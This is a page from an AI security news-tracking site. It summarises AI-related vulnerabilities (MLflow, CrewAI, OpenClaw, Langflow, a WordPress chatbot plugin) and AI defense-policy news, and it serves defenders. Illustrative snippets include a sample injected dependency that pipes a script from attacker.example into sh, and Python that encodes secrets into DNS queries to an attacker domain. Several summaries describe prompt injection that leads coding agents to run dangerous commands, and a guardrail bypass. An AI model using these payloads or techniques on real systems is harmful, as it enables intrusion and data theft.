aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by Truong (Jack) Luu, Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. AI Sec Watch, built by an Information Systems Security researcher, helps security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Total tracked: 2,678 · Last 24 hours: 24 · Last 7 days: 166
Daily Briefing: Monday, March 30, 2026

Anthropic's Unreleased Cybersecurity Model Accidentally Exposed: A configuration error leaked details of Anthropic's powerful new AI model called Mythos, designed for cybersecurity use cases with advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The leak raises concerns because the model's improved vulnerability detection could enable more sophisticated cyberattacks, prompting Anthropic to plan a phased rollout to enterprise security teams first.


Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where attackers insert malicious commands into input that gets executed) in its model serving code when using `env_manager=LOCAL`, allowing attackers to execute arbitrary commands by manipulating dependency information in the `python_env.yaml` file without any safety checks. (CVE-2025-15379, Critical)
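The injection pattern (and its standard mitigation) can be sketched in Python. The helpers below are illustrative, not MLflow's actual code, and `attacker.example` is a placeholder domain:

```python
def install_deps_unsafe(deps):
    # Vulnerable pattern: dependency strings taken from an untrusted
    # python_env.yaml are joined into a single shell string. Executed via
    # subprocess.run(cmd, shell=True), a ';' inside a "dependency" starts
    # a second, attacker-chosen command.
    return "pip install " + " ".join(deps)

def install_deps_safe(deps):
    # Mitigated pattern: build an argv list and run it without a shell
    # (subprocess.run(cmd)), so shell metacharacters in a dependency
    # string remain part of one literal argument.
    return ["pip", "install"] + list(deps)

malicious = ["requests; curl http://attacker.example/x.sh | sh"]
print(install_deps_unsafe(malicious))  # ';' splits off the curl payload
print(install_deps_safe(malicious))    # payload stays one inert argument
```

The difference is entirely in how the command reaches the OS: a single string handed to a shell is parsed for metacharacters, while an argv list is not.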

Latest Intel

01. Iran war heralds era of AI-powered bombing quicker than ‘speed of thought’

safety, policy

Multiple High-Severity Flaws in AI Agent Frameworks: CrewAI has several vulnerabilities including Docker fallback issues that enable RCE (remote code execution, where attackers run commands on systems they don't control) when containerization fails (CVE-2026-2287, CVE-2026-2275), while OpenClaw suffers from malicious plugin code execution during installation and sandbox bypass flaws that let agents access other agents' workspaces. SakaDev and HAI Build Code Generator can both be tricked through prompt injection (hiding malicious instructions in normal-looking input) to misclassify dangerous terminal commands as safe and execute them automatically (CVE-2026-30306, CVE-2026-30308).


ChatGPT Data Leakage Vulnerability Patched: OpenAI fixed a vulnerability that allowed attackers to secretly extract sensitive user data including conversation messages and uploaded files by exploiting a hidden DNS-based communication channel (covert data transmission using the Domain Name System) in ChatGPT's Linux runtime, bypassing all safety guardrails designed to prevent unauthorized data sharing.
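DNS-based covert channels of this kind generally work by smuggling data into the hostnames being resolved. A minimal sketch of the generic encoding technique (not a reconstruction of the actual ChatGPT exploit), with `exfil.attacker.example` as a placeholder domain:

```python
import base64

ATTACKER_DOMAIN = "exfil.attacker.example"  # placeholder attacker domain

def encode_exfil_queries(secret: bytes, chunk: int = 30) -> list[str]:
    # DNS labels are limited to 63 bytes and are case-insensitive, so the
    # payload is base32-encoded and split into short chunks; resolving
    # <chunk>.<domain> delivers each piece to the attacker's nameserver
    # even when normal HTTP egress is blocked by guardrails.
    b32 = base64.b32encode(secret).decode().rstrip("=").lower()
    return [f"{b32[i:i + chunk]}.{ATTACKER_DOMAIN}"
            for i in range(0, len(b32), chunk)]

for query in encode_exfil_queries(b"session-token-123"):
    print(query)  # each lookup leaks one chunk of the secret
```

This is why sandbox egress policies need to cover DNS resolution itself, not only HTTP traffic.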

Mar 3, 2026

The US military reportedly used Anthropic's Claude AI model to help plan attacks on Iran, enabling bombing campaigns faster than human decision-making can occur by shortening the "kill chain" (the process from identifying a target to getting legal approval and launching a strike). Experts worry this technology could push human decision-makers out of the loop entirely.

The Guardian Technology
02. OpenAI's Altman admits defense deal was 'opportunistic and sloppy' amid backlash

policy
Mar 2, 2026

OpenAI CEO Sam Altman acknowledged that the company rushed into a deal with the U.S. Department of Defense, calling it "opportunistic and sloppy," after public backlash over the timing and terms.

Fix: OpenAI will amend the contract to include new language stating that "the AI system shall not be intentionally used for domestic surveillance of U.S. persons and nationals." The company also stated it would work with the Pentagon on technical safeguards, and Altman affirmed that the Defense Department had confirmed OpenAI's tools would not be used by intelligence agencies such as the NSA.

CNBC Technology
03. GHSA-6g25-pc82-vfwp: OpenClaw: macOS beta onboarding exposed PKCE verifier via OAuth state

security
Mar 2, 2026

The OpenClaw macOS beta onboarding flow had a security flaw where it exposed a PKCE code_verifier (a secret token used in OAuth, a system for secure login) by putting it in the OAuth state parameter, which could be seen in URLs. This vulnerability only affected the macOS beta app's login process, not other parts of the software.
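For contrast, RFC 7636 intends the code_verifier to stay on the client until the token exchange: only its SHA-256 challenge goes into the (observable) authorize URL, and `state` is a separate random CSRF value. A minimal sketch of the correct construction:

```python
import base64
import hashlib
import secrets

def make_pkce_pair() -> tuple[str, str]:
    # The verifier is a high-entropy secret; only its S256 challenge
    # (base64url, unpadded) is ever placed in a URL.
    verifier = base64.urlsafe_b64encode(secrets.token_bytes(32)).rstrip(b"=").decode()
    digest = hashlib.sha256(verifier.encode("ascii")).digest()
    challenge = base64.urlsafe_b64encode(digest).rstrip(b"=").decode()
    return verifier, challenge

verifier, challenge = make_pkce_pair()
state = secrets.token_urlsafe(16)  # anti-CSRF token, unrelated to the verifier

# Only these parameters belong in the authorize URL; putting the
# verifier into `state` is the mistake described above.
authorize_params = {
    "code_challenge": challenge,
    "code_challenge_method": "S256",
    "state": state,
}
assert verifier not in authorize_params.values()
```

Because the challenge is a one-way hash, an attacker who observes the URL cannot recover the verifier needed at the token endpoint.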

Fix: OpenClaw removed Anthropic OAuth sign-in from macOS onboarding and replaced it with setup-token-only authentication. The fix is available in patched version 2026.2.25.

GitHub Advisory Database
04. CVE-2026-1336: The AI ChatBot with ChatGPT and Content Generator by AYS plugin for WordPress is vulnerable to unauthorized access and m…

security
Mar 2, 2026

A WordPress plugin called 'AI ChatBot with ChatGPT and Content Generator by AYS' has a security flaw in versions up to 2.7.5 where missing authorization checks (verification that a user has permission to perform an action) allow attackers without accounts to view, modify, or delete the plugin's ChatGPT API key (a secret code needed to use OpenAI's service). The vulnerability was partially fixed in version 2.7.5 and fully fixed in version 2.7.6.

Fix: Update the plugin to version 2.7.6 or later, where the vulnerability was fully fixed.

NVD/CVE Database
05. CyberStrikeAI tool adopted by hackers for AI-powered attacks

security
Mar 2, 2026

Hackers are using CyberStrikeAI, an open-source AI security testing platform, to automate attacks against network devices like firewalls. The tool combines over 100 security utilities with an AI decision engine (compatible with GPT, Claude, and DeepSeek models) to automatically scan networks, find vulnerabilities, and execute attacks with minimal hacker skill required. Researchers warn this represents a growing threat as adversaries adopt AI-powered orchestration engines (systems that coordinate multiple tools automatically) to target exposed network equipment.

BleepingComputer
06. ChatGPT uninstalls surged by 295% after DoD deal

policy
Mar 2, 2026

ChatGPT's mobile app uninstalls surged 295% after OpenAI announced a partnership with the U.S. Department of Defense, while competitor Anthropic's Claude app saw downloads jump 37-51% after publicly declining a similar defense partnership over concerns about AI being used for surveillance and autonomous weapons. The shift in user preference was reflected in app store rankings, with Claude reaching the number one position and ChatGPT receiving a sharp increase in negative reviews.

TechCrunch
07. GHSA-943q-mwmv-hhvh: OpenClaw: Gateway /tools/invoke tool escalation + ACP permission auto-approval

security
Mar 2, 2026

OpenClaw Gateway had two security flaws that could let an attacker with a valid token escalate their access: the HTTP endpoint (`POST /tools/invoke`, a web interface for running tools) didn't block dangerous tools like session spawning by default, and the permission system could auto-approve risky operations without enough user confirmation. Together, these could allow an attacker to execute commands or control sessions if they reach the Gateway.

Fix: Update to OpenClaw version 2026.2.14 or later. The fix includes: denying high-risk tools over HTTP by default (with configuration overrides available via `gateway.tools.{allow,deny}`), requiring explicit prompts for any non-read/search permissions in the ACP (access control permission) system, adding security warnings when high-risk tools are re-enabled, and making permission matching stricter to prevent accidental auto-approvals. Additionally, keep the Gateway loopback-only (only accessible locally) by setting `gateway.bind="loopback"` or using `openclaw gateway run --bind loopback`, and avoid exposing it directly to the internet without using an SSH tunnel or Tailscale.
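The loopback hardening from the fix note can be sketched as shell commands; `openclaw gateway run --bind loopback` is quoted from the advisory above, while the SSH host and port number are placeholders:

```shell
# Keep the Gateway bound to loopback only (command quoted from the advisory):
openclaw gateway run --bind loopback

# Reach it remotely through an SSH tunnel rather than exposing the port
# directly (user@agent-host and port 18789 are placeholder values):
ssh -N -L 18789:127.0.0.1:18789 user@agent-host
```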

GitHub Advisory Database
08. Stripe wants to turn your AI costs into a profit center

industry
Mar 2, 2026

Stripe released a preview feature that helps AI startups automatically bill their customers for AI model usage (tokens, which are units of text that AI models process) and add a profit margin on top of the underlying costs. For example, a startup can charge customers 30% more than what it pays to access models from providers like OpenAI or Google, with Stripe automating the tracking and billing process across multiple AI models and third-party gateways.

TechCrunch
09. No one has a good plan for how AI companies should work with the government

policy
Mar 2, 2026

OpenAI won a Pentagon contract that Anthropic refused, sparking public backlash over concerns about the company's involvement in mass surveillance and automated weaponry. The situation highlights that as AI companies become part of national security infrastructure, neither the companies nor the government appear ready to manage the ethical and policy challenges this creates, particularly around who should have power over these decisions.

TechCrunch
10. Critical OpenClaw Vulnerability Exposes AI Agent Risks

security
Mar 2, 2026

A critical vulnerability in OpenClaw, a popular AI tool used by developers, has been discovered and patched. The flaw is part of a pattern of security problems affecting this rapidly-adopted AI agent (a software system that can perform tasks autonomously).

Fix: The vulnerability has been patched. No specific version number or patching instructions are provided in the source text.

Dark Reading
Critical This Week

- CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis… (NVD/CVE Database, Mar 27, 2026)
- Attackers exploit critical Langflow RCE within hours as CISA sounds alarm (CSO Online, Mar 27, 2026)
- CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability (CISA Known Exploited Vulnerabilities, Mar 26, 2026)
- CISA: New Langflow flaw actively exploited to hijack AI workflows (BleepingComputer, Mar 26, 2026)